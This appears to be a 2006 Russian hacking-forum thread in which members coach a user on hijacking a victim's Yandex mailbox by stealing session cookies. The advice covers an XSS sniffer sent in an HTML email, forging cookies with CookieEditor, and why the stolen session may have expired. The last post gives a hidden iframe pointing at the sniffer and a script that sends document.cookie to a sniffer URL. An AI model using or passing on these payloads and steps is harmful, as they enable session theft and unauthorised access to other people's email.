Кукии

Discussion in 'Уязвимости Mail-сервисов' started by Petr, 13 Jun 2006.

  1. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Вопрос такой (знаю чт омного вопросы задаю, но я и почитал перед тем как задать)
    как можн оукратсь куки для входа на почту жертвы?
     
  2. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    а есть способ по легче типа, отослать писмо с приклиплёными данными, а куки придут мне.
    или как взломать комп жертвы?
    я вобще писмо отослал с с картинкой и там синфер. и на мой синфер пришли данные.
    тока что с нимим делать я не понял.
     
  3. Cold_Zer0

    Cold_Zer0 New Member

    Joined:
    8 Jun 2006
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Теперь возми прогу CookieEditor и подделай куки.
    Жаль не помню статей на эту тему...
    Но со снифером ты всё сделал правильно(ну правильно, если это сработало), типа XSS что то получилось, а теперь возьми прогу которую я посоветовал выше и подделай куки!
     
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,028
    Reputations:
    1,228
    Есть такая вещь как Xss.... в основном она используется для кражи кук... юзай поиск...
     
    _________________________
  5. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    спасибо за ответы,
    Я скачал прогу но я что то не понял как в ней поделовать куки,
    можеш мне в аску постучатся пожалуйсто.
     
  6. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    А то что я со снифером делала не то получается?
     
  7. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    88
    Reputations:
    17
    Какую почту ломаешь хоть?
    Ну раз пришли куки,вставляй в адресную строку.
    Скорей всего пришли не куки,а сессия.
     
  8. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Покопайся в видео! Какой сервер? Юзай сниффер! Зайди сюды /sniff/
     
  9. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    так я уже поюзал! и пришла именно сесия, но как её использовать? в адресну вставляю говарит логи пиши и пароль , сервер яндекс.
     
    #9 Petr, 13 Jun 2006
    Last edited: 13 Jun 2006
  10. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    88
    Reputations:
    17
    Куки в студию.
    Либо не то пришло,либо жертва нажала на кнопачку выход,после пользования ящиком.
    И сессия погибла...
     
  11. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Может там проверка по Ip
     
  12. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
  13. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Игиде здесь сессия?!!!
     
  14. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    что стоит в строке, а точнее после слова QUERY, то это тебе и надо. ).зайди на video.antichat.ru , там просто ПОЛНО этого.
     
  15. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    В query обычно передаются данные после snif.jpg?[QUERY]/// Тут обычно бывают кукии. Но не сессия!

    Покажи нам как ты отправлял сниффер!
     
  16. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    я сделал все как в теме угон сесии яндекс.
     
  17. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    тока что посмотрел это видио, и хотел спросить а этот хтмл код где можно взять?
    http://video.antichat.ru/file51.html
     
  18. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Какой код?! Как вставлять снифер?!
     
  19. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    ну да
     
  20. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    <iframe src="адрес сниффера" width=0 height=0>#</iframe> - Это для сессии...

    <script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script> Это для КУКИСОВ!

    Ты должен отправлять письма в формате HTML